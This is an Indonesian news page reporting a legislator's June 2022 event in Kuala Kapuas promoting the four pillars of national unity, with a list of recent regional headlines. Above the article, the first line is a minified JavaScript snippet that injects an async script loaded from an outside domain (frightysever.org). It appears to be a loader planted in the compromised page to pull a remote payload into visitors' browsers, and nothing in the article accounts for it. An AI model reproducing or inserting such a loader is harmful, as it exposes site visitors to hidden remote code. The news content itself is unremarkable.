(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Sosialisasi Empat Pilar Kebangsaan, Ary Egahni: Bersaudara Tanpa Membedakan Warna Kulit, Suku dan Agama


KANALKALIMANTAN. COM, KUALA KAPUAS – Anggota Komisi III Dewan Perwakilan Rakyat (DPR) Ary Egahni SH MH menggelar sosialisasi empat pilar kebangsaan Pancasila, UUD 1945, NKRI, dan Bhinneka Tunggal Ika, di halaman kantor Kecamatan Bataguh, Kamis (2/6/2022).

Kegiatan dihadiri Bupati Kapuas Ir Ben Brahim S Bahat, Kepala Organisasi Perangkat Daerah (OPD) Pemkab Kapuas, Camat Bataguh Suryadin, para kepala desa, tokoh agama, tokoh masyarakat, tokoh adat, serta masyarakat Desa Bataguh.

Ary Egahni mengatakan, Indonesia adalah negara yang besar dan memiliki keunikan dengan memiliki empat pilar kebangsaan sebagai konsensus bangsa.

“Pancasila sebagai Ideologi Negara, UUD 1945 sebagai konstitusi negara, NKRI adalah sebagai harga yang harus dipertahankan, Bhinneka Tunggal Ika adalah sebagai semboyan negara,” sebut Ary Egahni.

 

Baca juga  : Bukti Negara Hadir, PLN Salurkan Stimulus Listrik Pemerintah Rp 24,23 Triliun Selama Pandemi

Penting menjaga empat pilar kebangsaan agar generasi muda nantinya mampu mewarisi bangsa dan negara besar ini. Karena generasi muda yang kelak akan menjadi pemimpin bangsa ini.

“Pancasila sebagai Ideologi Negara, seperti yang kita tahu Pancasila sendiri berasal dari dua kata sansakerta, yakni panca yang berarti lima dan sila yang berarti prinsip atau asa. Kelima prinsip tersebut juga tercantum dalam paragraf keempat Pembukaan Undang–Undang Dasar 1945,” kata Ary Egahni.

UUD Negara Republik Indonesia tahun 1945 adalah hukum dasar tertulis, konstitusi pemerintahan negara Republik Indonesia saat ini. NKRI bediri dari Sabang sampai Merauke, sejak Proklamasi Kemerdekaan Indonesia pada 17 Agustus 1945.

Bhinneka Tunggal Ika merupakan motto atau semboyan Bangsa Indonesia yang tertulis pada lambang negara Indonesia, Garuda Pancasila. Frasa ini berasal dari bahasa Jawa Kuno yang artinya adalah berbeda-beda tetapi tetap satu.

 

Baca juga  : Kabupaten Banjar Ikuti Verifikasi Lapangan Hybrid KLA 2022

Demi mencapai tujuan untuk mewujudkan Empat Pilar Kebangsaan diperlukan pemuda-pemudi yang tangguh dan memiliki jiwa kepemimpinan agar mampu menjadi panutan.

“Jadi untuk mewujudkan empat pilar kebangsaan kita juga harus saling memotivasi sesama, agar merasa terpacu berkewajiban mewujudkan empat pilar kebangsaan tersebut,” imbuh Ary Egahni.

“Semua bisa kita atasi dengan kebersamaan, kekompakan dan persaudaraan tanpa membedakan warna kulit, suku dan agama karena semua orang yang ada di Kabupaten Kapuas dan Kalimantan Tengah adalah bersaudara walaupun tidak sedarah,” pungkas Ary Egahni. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Desy Arfianty

Recent Posts

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

8 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

10 jam ago

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

13 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

13 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

16 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

18 jam ago

This website uses cookies.